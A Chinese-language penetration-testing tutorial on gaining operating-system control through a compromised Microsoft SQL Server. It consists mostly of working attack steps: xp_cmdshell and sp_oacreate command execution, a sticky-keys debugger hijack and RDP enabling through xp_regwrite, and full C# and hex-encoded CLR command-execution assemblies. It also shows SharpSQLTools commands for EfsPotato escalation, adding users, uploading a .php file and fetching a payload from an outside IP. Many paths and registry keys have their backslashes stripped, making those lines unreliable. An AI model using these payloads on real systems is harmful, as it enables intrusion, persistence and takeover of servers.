我们一般拿下SqlServer数据库之后,基本上就是通过相关提权进行获取权限。
MSSQL权限级别
sa权限:数据库操作,文件管理,命令执行,注册表读取等价于system,SQLServer数据库的最高权限db权限:文件管理,数据库操作等价于 users-administratorspublic权限:数据库操作等价于 guest-users
存储过程
MSSQL的存储过程是一个可编程的函数,它在数据库中创建并保存,是使用T_SQL编写的代码段,目的在于能够方便的从系统表中查询信息。数据库中的存储过程可以看做是对编程中面向对象方法的模拟。它允许控制数据的访问方式,使用execute命令执行存储过程。(可以将存储过程理解为函数调用的过程)
简单来说,存储过程就是一条或者多条sql语句的集合,可视为批处理文件
存储过程可分为三类:系统存储过程:主要存储在master数据库中,以”sp_“为前缀,在任何数据库中都可以调用,在调用的时候不必在存储过程前加上数据库名 扩展存储过程:是对动态链接库(DLL)函数的调用,主要是用于客户端与服务器端或客户端之间进行通信的,以“xp**_“为前缀,使用方法与系统存储过程类似 用户定义的存储过程:**是SQLServer的使用者编写的存储过程
我们可以使用如下命令来启动MSSQL
net stop mssqlserver 关闭MSSQLnet start mssqlserver 启动MSSQL
MSSQL设置允许通过ip登陆
打开MSSQL配置管理器。
点击启动之后,需要重新启动MSSQL,上面命令即可。
当我们启动的时候我们使用impack-mssqlclient去连接的时候,发现是可以正常连接的。
关闭的时候,我们发现是无法连接的。
那么我们发现开了防火墙之后,也是无法连接的。
当我们防火墙给他一个入口和出口都允许1433端口连接的话,我们发现是可以连接的。
MSSQL常见的命令语句
查看数据库版本:
select @@VERSION获取MSSQL中的所有数据库名
SELECT name FROM MASter..SysDatabASes ORDER BY name查询所有数据库中的表名
SELECT SysObjects.name AS Tablename FROM sysobjects WHERE xtype = 'U' and sysstat<200exec xp_dirtree 'c:' # 列出所有c:文件、目录、子目录exec xp_dirtree 'c:',1 # 只列c:目录exec xp_dirtree 'c:',1,1 # 列c:目录、文件exec xp_subdirs 'C:'; # 只列c:目录select is_srvrolemember('sysadmin') # 判断是否是SA权限select is_member('db_owner') # 判断是否是db_owner权限select is_srvrolemember('public') # 判断是否是public权限EXEC sp_configure 'Ole Automation Procedures' #查看OLE Automation Procedures的当前设置
xp_cmdshell提权
xp_cmdshell默认在mssql2000中是开启的,在mssql2005之后默认禁止,但未删除
xp``_cmdshell是Sql Server中的一个组件,将命令字符串作为操作系统命令 shell 执行,并以文本行的形式返回所有输出。通常在拿到sa口令之后,可以通过xp``_cmdshell来进行提权
影响范围:
只要该数据库存在该组件,就可以利用
查看xp_cmdshell状态
select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
返回1表示xp``_cmdshell组件启用
开启xp_cmdshell组件
EXEC sp_configure 'show advanced options', 1RECONFIGUREEXEC sp_configure 'xp_cmdshell',1RECONFIGURE
同样,关闭该组件的命令为
EXEC sp_configure 'show advanced options', 1RECONFIGUREEXEC sp_configure 'xp_cmdshell',0RECONFIGURE
利用xp_cmdshell执行命令
以下几条命令格式都可以用于执行系统命令
exec xp_cmdshell "whoami"master..xp_cmdshell 'whoami' (2008版上好像用不了)EXEC master..xp_cmdshell "whoami"EXEC master.dbo.xp_cmdshell "ipconfig"
如上图返回的是mssqlserver的用户,在MSSQL2019版本中,会使用mssqlserver用户而非system用户。
保护措施
将该xp_cmdshell存储过程删除即可
exec sp_dropextendedproc 'xp_cmdshell'被删除后,重新添加xp``_cmdshell存储过程语句
EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int;sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll';
若想彻底删除xp_cmdshell扩展存储过程,建议在C盘里直接搜索xplog70.dll,然后删除xp_cmdshell。
使用sp_oacreate进行提权|无回显
sp_oacreate系统存储过程可以用于对文件删除、复制、移动等操作,还可以配合sp_oamethod系统存储过程调用系统wscript.shell来执行系统命令。sp_oacreate和sp_oamethod两个过程分别用来创建和执行脚本语言。
系统管理员使用sp_configure启用sp_oacreate和sp_oamethod系统存储过程对OLE自动化过程的访问(OLE Automation Procedures)
在效果方面,sp_oacreate、sp_oamethod两个过程和xp_cmdshell过程功能类似,因此可以替换使用!
利用条件
已获取到sqlserver sysadmin权限用户的账号与密码且未降权(如2019版本sa用户权限为mssqlserver,已降权)
sqlserver允许远程连接
OLE Automation Procedures选项开启
查看sp_oacreate状态
select count(*) from master.dbo.sysobjects where xtype='x' and name='SP_OACREATE';
返回1代表存在sp_oacreate系统存储过程。
启用OLE Automation Procedures选项
当启用 OLE Automation Procedures 时,对 sp_OACreate 的调用将会启动 OLE 共享执行环境
xxxxxxxxxx exec sp_configure 'show advanced options',1;reconfigure;exec sp_configure 'Ole Automation Procedures',1;reconfigure;类似的,关闭组件命令
exec sp_configure 'show advanced options',1;reconfigure;exec sp_configure 'Ole Automation Procedures',0;reconfigure;
利用sp_oacreate和sp_oamethod执行命令
写入文件
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:windowssystem32cmd.exe /c whoami >c:\windows\temp\1.txt';回显0表示成功这里这里的话是如果你指定的是C盘,是没有权限写入的,你将看不到文件。
删除文件
declare @result intdeclare @fso_token intexec sp_oacreate 'scripting.filesystemobject', @fso_token outexec sp_oamethod @fso_token,'deletefile',null,'c:sqltest.txt'exec sp_oadestroy @fso_token
同样,也可以创建用户进行登录拿权限。
SQL Server 沙盒简介
使用xp_regwrite提权
通过使用xp_regwrite存储过程对注册表进行修改,替换成任意值,造成镜像劫持。
前提条件:
未禁止注册表编辑(即写入功能)
xp_regwrite启用
映像劫持提权
查看xp_regwrite是否启用
select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_regwrite'xp_regwrite开启与关闭
EXEC sp_configure 'show advanced options', 1RECONFIGUREEXEC sp_configure 'xp_regwrite',1RECONFIGURE
利用regwrite函数修改组注册表进行劫持
EXEC master..xp_regwrite @rootkey='HKEY_LOCAL_MACHINE',@key='SOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionssethc.EXE',@value_name='Debugger',@type='REG_SZ',@value='c:windowssystem32cmd.exe'查看是否修改成功文件
exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionssethc.exe','Debugger'显示已修改为cmd.exe
在目标主机上查看,结果一致
上面对只是对粘滞键进行修改,类似的,可以在注册表中进行其他操作
开启3389端口这里的xp``_regwrite为向注册表中写数据
exec master.dbo.xp_regwrite'HKEY_LOCAL_MACHINE','SYSTEMCurrentControlSetControlTerminal Server','fDenyTSConnections','REG_DWORD',0;exec master..xp_cmdshell "REG ADD 'HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server' /v fDenyTSConnections /t REG_DWORD /d 0"
CLR利用
CLR微软官方把他称为公共语言运行时,从 SQL Server 2005 (9.x) 开始,SQL Server 集成了用于 Microsoft Windows 的 .NET Framework 的公共语言运行时 (CLR) 组件。这意味着现在可以使用任何 .NET Framework 语言(包括 Microsoft Visual Basic .NET 和 Microsoft Visual C#)来编写存储过程、触发器、用户定义类型、用户定义函数、用户定义聚合和流式表值函数。
using System;using System.Data;using System.Data.SqlClient;using System.Data.SqlTypes;using System.Diagnostics;using System.Text;using Microsoft.SqlServer.Server;public partial class StoredProcedures{ [Microsoft.SqlServer.Server.SqlProcedure] public static void ExecCommand (string cmd) { // 在此处放置代码 SqlContext.Pipe.Send("Command is running, please wait."); SqlContext.Pipe.Send(RunCommand("cmd.exe", " /c " + cmd)); } public static string RunCommand(string filename,string arguments) { var process = new Process(); process.StartInfo.FileName = filename; if (!string.IsNullOrEmpty(arguments)) { process.StartInfo.Arguments = arguments; } process.StartInfo.CreateNoWindow = true; process.StartInfo.WindowStyle = ProcessWindowStyle.Hidden; process.StartInfo.UseShellExecute = false; process.StartInfo.RedirectStandardError = true; process.StartInfo.RedirectStandardOutput = true; var stdOutput = new StringBuilder(); process.OutputDataReceived += (sender, args) => stdOutput.AppendLine(args.Data); string stdError = null; try { process.Start(); process.BeginOutputReadLine(); stdError = process.StandardError.ReadToEnd(); process.WaitForExit(); } catch (Exception e) { SqlContext.Pipe.Send(e.Message); } if (process.ExitCode == 0) { SqlContext.Pipe.Send(stdOutput.ToString()); } else { var message = new StringBuilder(); if (!string.IsNullOrEmpty(stdError)) { message.AppendLine(stdError); } if (stdOutput.Length != 0) { message.AppendLine("Std output:"); message.AppendLine(stdOutput.ToString()); } SqlContext.Pipe.Send(filename + arguments + " finished with exit code = " + process.ExitCode + ": " + message); } return stdOutput.ToString(); }}启用MSSQL CLR功能
MSSQL CLR功能默认关闭,利用以下语句启用。
sp_configure 'clr enabled', 1GORECONFIGUREGO
为了导入了不安全的程序集,我们还需要执行以下语句将数据库标记为安全。
ALTER DATABASE master SET TRUSTWORTHY ON;利用SQL语句导入程序集
CREATE ASSEMBLY [Database1]AUTHORIZATION [dbo]FROM 0x4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000800000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A2400000000000000504500004C0103006E587C5E0000000000000000E00022200B013000000E00000006000000000000522C0000002000000040000000000010002000000002000004000000000000000400000000000000008000000002000000000000030040850000100000100000000010000010000000000000100000000000000000000000002C00004F00000000400000A802000000000000000000000000000000000000006000000C000000C82A00001C0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000200000080000000000000000000000082000004800000000000000000000002E74657874000000580C000000200000000E000000020000000000000000000000000000200000602E72737263000000A8020000004000000004000000100000000000000000000000000000400000402E72656C6F6300000C0000000060000000020000001400000000000000000000000000004000004200000000000000000000000000000000342C00000000000048000000020005007C2200004C0800000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000CA00280600000A72010000706F0700000A00280600000A7243000070725300007002280800000A28020000066F0700000A002A001B300600BC0100000100001173040000060A00730900000A0B076F0A00000A026F0B00000A0003280C00000A16FE010D092C0F00076F0A00000A036F0D00000A0000076F0A00000A176F0E00000A00076F0A00000A176F0F00000A00076F0A00000A166F1000000A00076F0A00000A176F1100000A00076F0A00000A176F1200000A0006731300000A7D010000040706FE0605000006731400000A6F1500000A00140C00076F1600000A26076F1700000A00076F1800000A6F1900000A0C076F1A00000A0000DE18130400280600000A11046F1B00000A6F0700000A0000DE00076F1C00000A16FE01130511052C1D00280600000A067B010000046F1D00000A6F0700000A000038AA00000000731300000A130608280C00000A16FE01130711072C0B001106086F1E00000A2600067B010000046F1F00000A16FE03130811082C22001106725D0000706F1E00000A261106067B010000046F1D00000A6F1E00000A2600280600000A1C8D0E000001251602A2251703A225187275000070A22519076F1C00000A13091209282000000AA2251A72AD000070A2251B1106252D0426142B056F1D00000AA2282100000A6F0700000A0000067B010000046F1D00000A130A2B00110A2A011000000000970025BC0018080000012202282200000A002A4E027B01000004046F2300000A6F1E00000A262A00000042534A4201000100000000000C00000076342E302E33303331390000000005006C000000A8020000237E000014030000B403000023537472696E677300000000C8060000B4000000235553007C0700001000000023475549440000008C070000C000000023426C6F620000000000000002000001571502000902000000FA0133001600000100000014000000030000000100000005000000050000002300000005000000010000000100000003000000010000000000D60101000000000006007001BA0206009001BA0206004601A7020F00DA02000006003C03E4010A005A015A020E001503A7020600EB01E40106002C027A0306002B01BA020E00FA02A7020A0086035A020A0023015A020600C401E4010E000302A7020E00D200A7020E004102A70206001402400006002102400006003100E401000000003700000000000100010001001000E9020000150001000100030110000100000015000100040006007003790050200000000096008D007D000100842000000000960099001A0002005C22000000008618A102060004005C22000000008618A102060004006522000000008300160082000400000001007F0000000100F200000002002B03000001003A020000020010030900A10201001100A10206001900A1020A003100A10206005100A102060061001A0110006900A4001500710035031A003900A10206003900F50132007900E50015007100A403370079001D031500790091033C007900C20041007900AE013C00790087023C00790055033C004900A10206008900A1024700390068004D0039004F0353003900FB000600390075025700990083005C003900430306004100B6005C003900A90060002900C2015C0049000F0164004900CB016000A100C2015C00710035036A002900A1020600590056005C0020002300BA002E000B0089002E00130092002E001B00B10063002B00BA0020000480000000000000000000000000000000002700000004000000000000000000000070005F000000000004000000000000000000000070004A00000000000400000000000000000000007000E40100000000030002000000003C3E635F5F446973706C6179436C617373315F30003C52756E436F6D6D616E643E625F5F300044617461626173653100496E743332003C4D6F64756C653E0053797374656D2E494F0053797374656D2E44617461006765745F44617461006D73636F726C6962006164645F4F757470757444617461526563656976656400636D640052656164546F456E640045786563436F6D6D616E640052756E436F6D6D616E640053656E64006765745F45786974436F6465006765745F4D657373616765007365745F57696E646F775374796C650050726F6365737357696E646F775374796C65007365745F46696C654E616D650066696C656E616D6500426567696E4F7574707574526561644C696E6500417070656E644C696E65006765745F506970650053716C5069706500436F6D70696C657247656E6572617465644174747269627574650044656275676761626C654174747269627574650053716C50726F63656475726541747472696275746500436F6D70696C6174696F6E52656C61786174696F6E734174747269627574650052756E74696D65436F6D7061746962696C697479417474726962757465007365745F5573655368656C6C4578656375746500546F537472696E67006765745F4C656E677468004461746162617365312E646C6C0053797374656D00457863657074696F6E006765745F5374617274496E666F0050726F636573735374617274496E666F0053747265616D526561646572005465787452656164657200537472696E674275696C6465720073656E646572004461746152656365697665644576656E7448616E646C6572004D6963726F736F66742E53716C5365727665722E536572766572006765745F5374616E646172644572726F72007365745F52656469726563745374616E646172644572726F72002E63746F720053797374656D2E446961676E6F73746963730053797374656D2E52756E74696D652E436F6D70696C6572536572766963657300446562756767696E674D6F6465730053746F72656450726F63656475726573004461746152656365697665644576656E744172677300617267730050726F63657373007365745F417267756D656E747300617267756D656E747300436F6E636174004F626A6563740057616974466F7245786974005374617274007365745F52656469726563745374616E646172644F7574707574007374644F75747075740053797374656D2E546578740053716C436F6E74657874007365745F4372656174654E6F57696E646F770049734E756C6C4F72456D707479000000004143006F006D006D0061006E0064002000690073002000720075006E006E0069006E0067002C00200070006C006500610073006500200077006100690074002E00000F63006D0064002E00650078006500000920002F0063002000001753007400640020006F00750074007000750074003A0000372000660069006E00690073006800650064002000770069007400680020006500780069007400200063006F006400650020003D00200000053A0020000000593C457501949B4EAC85A8875A6084DC000420010108032000010520010111110400001235042001010E0500020E0E0E11070B120C121D0E0212210212250202080E042000123D040001020E0420010102052001011141052002011C180520010112450320000204200012490320000E0320000805200112250E0500010E1D0E08B77A5C561934E08903061225040001010E062002011C122D0801000800000000001E01000100540216577261704E6F6E457863657074696F6E5468726F777301080100070100000000040100000000000000006E587C5E00000000020000001C010000E42A0000E40C000052534453CEC8B2762812304EAEE7EF5EE4D9EC7901000000463A5C746F6F6C735F736F757263655C4461746162617365315C4461746162617365315C6F626A5C44656275675C4461746162617365312E706462000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000282C00000000000000000000422C0000002000000000000000000000000000000000000000000000342C0000000000000000000000005F436F72446C6C4D61696E006D73636F7265652E646C6C0000000000FF250020001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001001000000018000080000000000000000000000000000001000100000030000080000000000000000000000000000001000000000048000000584000004C02000000000000000000004C0234000000560053005F00560045005200530049004F004E005F0049004E0046004F0000000000BD04EFFE00000100000000000000000000000000000000003F000000000000000400000002000000000000000000000000000000440000000100560061007200460069006C00650049006E0066006F00000000002400040000005400720061006E0073006C006100740069006F006E00000000000000B004AC010000010053007400720069006E006700460069006C00650049006E0066006F0000008801000001003000300030003000300034006200300000002C0002000100460069006C0065004400650073006300720069007000740069006F006E000000000020000000300008000100460069006C006500560065007200730069006F006E000000000030002E0030002E0030002E00300000003C000E00010049006E007400650072006E0061006C004E0061006D00650000004400610074006100620061007300650031002E0064006C006C0000002800020001004C006500670061006C0043006F00700079007200690067006800740000002000000044000E0001004F0072006900670069006E0061006C00460069006C0065006E0061006D00650000004400610074006100620061007300650031002E0064006C006C000000340008000100500072006F006400750063007400560065007200730069006F006E00000030002E0030002E0030002E003000000038000800010041007300730065006D0062006C0079002000560065007200730069006F006E00000030002E0030002E0030002E0030000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000C000000543C00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000WITH PERMISSION_SET = UNSAFE;GO
创建存储过程:
CREATE PROCEDURE [dbo].[ExecCommand]@cmd NVARCHAR (MAX)AS EXTERNAL NAME [Database1].[StoredProcedures].[ExecCommand]go
执行命令
exec dbo.ExecCommand "whoami";
WarSQLKit 工具
在看CLR编写的过程中,顺便看到有前辈开发了针对mssql CLR进行利用的渗透工具。
启用CLR
sp_configure 'clr enabled', 1GORECONFIGUREGO
将数据库标记为安全
ALTER DATABASE master SET TRUSTWORTHY ON;利用SQL语句导入程序集
CREATE ASSEMBLY [WarSQLKit]AUTHORIZATION [dbo]FROM 0x4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000800000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A2400000000000000504500004C010300D231BC590000000000000000E00002210B010B00001000000006000000000000EE2E0000002000000040000000000010002000000002000004000000000000000400000000000000008000000002000000000000030040850000100000100000000010000010000000000000100000000000000000000000942E000057000000004000004803000000000000000000000000000000000000006000000C0000005C2D00001C0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000200000080000000000000000000000082000004800000000000000000000002E74657874000000F40E0000002000000010000000020000000000000000000000000000200000602E7273726300000048030000004000000004000000120000000000000000000000000000400000402E72656C6F6300000C0000000060000000020000001600000000000000000000000000004000004200000000000000000000000000000000D02E0000000000004800000002000500AC220000B00A00000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000CA00280F00000A72010000706F1000000A00280F00000A7243000070725300007002281100000A28020000066F1000000A002A1E02281200000A2A4E027B01000004046F1300000A6F1400000A262A001B300400E5010000010000117304000006130400731500000A0A066F1600000A026F1700000A0003281800000A130611062D0F00066F1600000A036F1900000A0000066F1600000A176F1A00000A00066F1600000A176F1B00000A00066F1600000A166F1C00000A00066F1600000A176F1D00000A00066F1600000A176F1E00000A001104731F00000A7D01000004061104FE0605000006732000000A6F2100000A00140B00066F2200000A26066F2300000A00066F2400000A6F2500000A0B066F2600000A0000DE450C00280F00000A1B8D130000011307110716725D000070A211071702A211071803A21107197291000070A211071A086F2700000AA21107282800000A6F1000000A0000DE0000066F2900000A16FE0116FE01130611062D1E00280F00000A11047B010000046F2A00000A6F1000000A0000389E00000000731F00000A0D07281800000A130611062D0A0009076F1400000A260011047B010000046F2B00000A16FE01130611062D21000972970000706F1400000A260911047B010000046F2A00000A6F1400000A2600280F00000A1C8D01000001130811081602A211081703A211081872AF000070A2110819066F2900000A8C1D000001A211081A7291000070A211081B09A21108282C00000A6F1000000A000011047B010000046F2A00000A13052B0011052A000000011000000000990025BE00451C0000011E02281200000A2A42534A4201000100000000000C00000076342E302E33303331390000000005006C00000050030000237E0000BC030000E004000023537472696E6773000000009C080000E80000002355530084090000100000002347554944000000940900001C01000023426C6F620000000000000002000001571502000902000000FA253300160000010000001E000000030000000100000005000000050000002D0000000D0000000100000001000000030000000100000000000A000100000000000600400039000600890077000600A00077000600BD0077000600DC0077000600F500770006000E01770006002901770006004401770006005D0177000600760177000600A60193013300BA0100000600E901C90106000902C9010A005F0244020A00750244020A00800244020600960239000600C302B7020E00DB0293010E00220393010E002A0393010E00850393010E00F1039301060045043B04060064043B040600850439000600BC0439000600C204C9010000000001000000000001000100010010001F00000005000100010003011000A40200000500010004000600D1023300502000000000960047000A000100A0200000000096004F000F000200A4220000000086185A001500040083200000000086185A00150004008B20000000008600F10237000400000001006000000001006400000002006D0000000100020300000200090311005A00190019005A00190021005A00190029005A00190031005A00190039005A00190041005A00190049005A00190051005A00190059005A00190061005A001E0071005A00240079005A00150081005A001500890088022E0091009102190099009D020F0009005A001500A9000E033E00A10017034200B1005A001500B1003B034800B90049031900990056034D00B90064031900B90072035200B90098035700B900A8035200B900BC035200B900D6035200A1005A001500C9005A005D00B1000A046300B10021046900B10027041500B10052046D00D9006F043E00B10079041500E1008F043E0099009D027200B1009B0478000900A8043E00A100B104780099009D027C00F1005A0015002000730029002E002B00B0002E000B0094002E001300AA002E001B00AA002E002300AA002E005300DD002E006B00FC002E003B00AA002E003300C0002E005B00EA002E006300F30063006B012900820004800000010000000000000000000000000027020000040000000000000000000000010030000000000004000000000000000000000001003802000000000400000000000000000000000100390000000000030002000000003C4D6F64756C653E0057617253514C4B69744D696E696D616C2E646C6C0053746F72656450726F63656475726573006D73636F726C69620053797374656D004F626A65637400436D64457865630052756E436F6D6D616E64002E63746F7200636D640066696C656E616D6500617267756D656E74730053797374656D2E5265666C656374696F6E00417373656D626C795469746C6541747472696275746500417373656D626C794465736372697074696F6E41747472696275746500417373656D626C79436F6E66696775726174696F6E41747472696275746500417373656D626C79436F6D70616E7941747472696275746500417373656D626C7950726F6475637441747472696275746500417373656D626C79436F7079726967687441747472696275746500417373656D626C7954726164656D61726B41747472696275746500417373656D626C7943756C7475726541747472696275746500417373656D626C7956657273696F6E41747472696275746500417373656D626C7946696C6556657273696F6E4174747269627574650053797374656D2E446961676E6F73746963730044656275676761626C6541747472696275746500446562756767696E674D6F6465730053797374656D2E52756E74696D652E436F6D70696C6572536572766963657300436F6D70696C6174696F6E52656C61786174696F6E734174747269627574650052756E74696D65436F6D7061746962696C6974794174747269627574650057617253514C4B69744D696E696D616C0053797374656D2E44617461004D6963726F736F66742E53716C5365727665722E5365727665720053716C50726F6365647572654174747269627574650053716C436F6E746578740053716C50697065006765745F506970650053656E6400537472696E6700436F6E636174003C3E635F5F446973706C6179436C617373310053797374656D2E5465787400537472696E674275696C646572007374644F7574707574004461746152656365697665644576656E7441726773003C52756E436F6D6D616E643E625F5F300073656E6465720061726773006765745F4461746100417070656E644C696E650050726F636573730050726F636573735374617274496E666F006765745F5374617274496E666F007365745F46696C654E616D650049734E756C6C4F72456D707479007365745F417267756D656E7473007365745F4372656174654E6F57696E646F770050726F6365737357696E646F775374796C65007365745F57696E646F775374796C65007365745F5573655368656C6C45786563757465007365745F52656469726563745374616E646172644572726F72007365745F52656469726563745374616E646172644F7574707574004461746152656365697665644576656E7448616E646C6572006164645F4F757470757444617461526563656976656400537461727400426567696E4F7574707574526561644C696E650053797374656D2E494F0053747265616D526561646572006765745F5374616E646172644572726F7200546578745265616465720052656164546F456E640057616974466F724578697400457863657074696F6E006765745F4D657373616765006765745F45786974436F646500546F537472696E67006765745F4C656E67746800496E74333200436F6D70696C657247656E65726174656441747472696275746500000000004143006F006D006D0061006E0064002000690073002000720075006E006E0069006E0067002C00200070006C006500610073006500200077006100690074002E00000F63006D0064002E00650078006500000920002F006300200000334F00530020006500720072006F00720020007700680069006C006500200065007800650063007500740069006E006700200000053A002000001753007400640020006F00750074007000750074003A0000372000660069006E00690073006800650064002000770069007400680020006500780069007400200063006F006400650020003D0020000000AFD64FA5968D524A81BD4177F4EBB8F50008B77A5C561934E089040001010E0500020E0E0E03200001042001010E05200101113504200101080401000000040000124903061251062002011C12550320000E05200112510E042000125D040001020E0420010102052001011161052002011C180520010112650320000204200012690500010E1D0E032000080500010E1D1C11070912590E12711251120C0E021D0E1D1C1501001057617253514C4B69744D696E696D616C00000501000000000F01000A457975702043454C494B00001C010017687474703A2F2F6579757063656C696B2E636F6D2E747200000C010007312E302E302E3000000801000701000000000801000800000000001E01000100540216577261704E6F6E457863657074696F6E5468726F7773010000000000D231BC5900000000020000001C010000782D0000780F000052534453291C2A89D041FE44A430FAE3DA807C8E0A000000633A5C55736572735C734B7957695065725C446F63756D656E74735C56697375616C2053747564696F20323031355C50726F6A656374735C57617253514C4B69745C57617253514C4B69744D696E696D616C5C6F626A5C44656275675C57617253514C4B69744D696E696D616C2E706462000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000BC2E00000000000000000000DE2E0000002000000000000000000000000000000000000000000000D02E00000000000000000000000000000000000000005F436F72446C6C4D61696E006D73636F7265652E646C6C0000000000FF25002000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100100000001800008000000000000000000000000000000100010000003000008000000000000000000000000000000100000000004800000058400000F00200000000000000000000F00234000000560053005F00560045005200530049004F004E005F0049004E0046004F0000000000BD04EFFE00000100000001000000000000000100000000003F000000000000000400000002000000000000000000000000000000440000000100560061007200460069006C00650049006E0066006F00000000002400040000005400720061006E0073006C006100740069006F006E00000000000000B00450020000010053007400720069006E006700460069006C00650049006E0066006F0000002C02000001003000300030003000300034006200300000004C0011000100460069006C0065004400650073006300720069007000740069006F006E0000000000570061007200530051004C004B00690074004D0069006E0069006D0061006C0000000000300008000100460069006C006500560065007200730069006F006E000000000031002E0030002E0030002E00300000004C001500010049006E007400650072006E0061006C004E0061006D0065000000570061007200530051004C004B00690074004D0069006E0069006D0061006C002E0064006C006C00000000005400180001004C006500670061006C0043006F007000790072006900670068007400000068007400740070003A002F002F006500790075007000630065006C0069006B002E0063006F006D002E007400720000005400150001004F0072006900670069006E0061006C00460069006C0065006E0061006D0065000000570061007200530051004C004B00690074004D0069006E0069006D0061006C002E0064006C006C000000000038000B000100500072006F0064007500630074004E0061006D0065000000000045007900750070002000430045004C0049004B0000000000340008000100500072006F006400750063007400560065007200730069006F006E00000031002E0030002E0030002E003000000038000800010041007300730065006D0062006C0079002000560065007200730069006F006E00000031002E0030002E0030002E003000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000C000000F03E00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000WITH PERMISSION_SET = UNSAFE;GO
这里说一下该十六进制非常长,在WarSQLKit.dacpac文件内解压该文件,源码存放在model.xml文件中
创建存储过程
CREATE PROCEDURE sp_cmdExec@Command [nvarchar](4000)WITH EXECUTE AS CALLERASEXTERNAL NAME WarSQLKit.StoredProcedures.CmdExecGO
执行系统命令:
EXEC sp_cmdExec 'whoami';SharpSQLTools 集成了以上功能。除了基础功能,还有令人称赞的提权和上线cobaltstrike。
比如提权具有SeImpersonatePrivilege本地权限的用户。先安装自定义的clrexec存储再执行。
先安装自定义的clrexec存储再执行。
SharpSQLTools.exe 192.168.213.137 sa Admin123.. master install_clr whoamiSharpSQLTools.exe 192.168.213.137 sa Admin123.. master enable_clrSharpSQLTools.exe 192.168.213.137 sa Admin123.. master clr_efspotato whoami
添加用户:
SharpSQLTools.exe 192.168.213.137 sa Admin123.. master clr_adduser test1234 1qaz@WSX下载文件:
SharpSQLTools.exe 192.168.213.137 sa Admin123.. master clr_download "http://43.137.19.241:5000/1.txt" "c:UsersPublicDownloadstest.bin"
文件上传:
SharpSQLTools.exe 192.168.213.137 sa Admin123.. master upload C:UsersadminDesktop1.php c:UsersPublicDownloads11.php
MSSQL不出网文件落地上线方式
启用OLE组件
exec master.dbo.sp_configure 'show advanced options', 1RECONFIGUREexec master.dbo.sp_configure 'Ole Automation Procedures', 1RECONFIGURE
